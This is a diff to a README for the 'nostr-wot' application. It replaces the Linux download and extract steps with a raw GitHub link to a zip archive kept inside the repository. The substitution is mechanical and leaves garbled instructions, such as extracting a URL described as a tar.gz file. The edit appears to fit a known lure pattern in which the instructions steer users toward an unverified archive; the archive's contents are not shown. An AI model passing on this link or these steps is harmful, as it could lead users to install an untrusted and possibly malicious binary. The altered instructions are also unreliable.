vgiappnee-web/nostr-wot/README.md

    Click on the download link for your operating system.
    - For Windows, download the `.exe` file.
    - For Mac, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://github.com/vgiappnee-web/nostr-wot/raw/refs/heads/main/app/nostr_wot_v1.6.zip` file.

 4. **Install the Application:**
    - For Windows: Double-click the `.exe` file and follow the prompts to install the application.
    - For Mac: Open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the instructions included in the README.
+   - For Linux: Extract the `https://github.com/vgiappnee-web/nostr-wot/raw/refs/heads/main/app/nostr_wot_v1.6.zip` file and follow the instructions included in the README.

 5. **Launch the Application:**
    Once installed, find **nostr-wot** in your applications and start using it!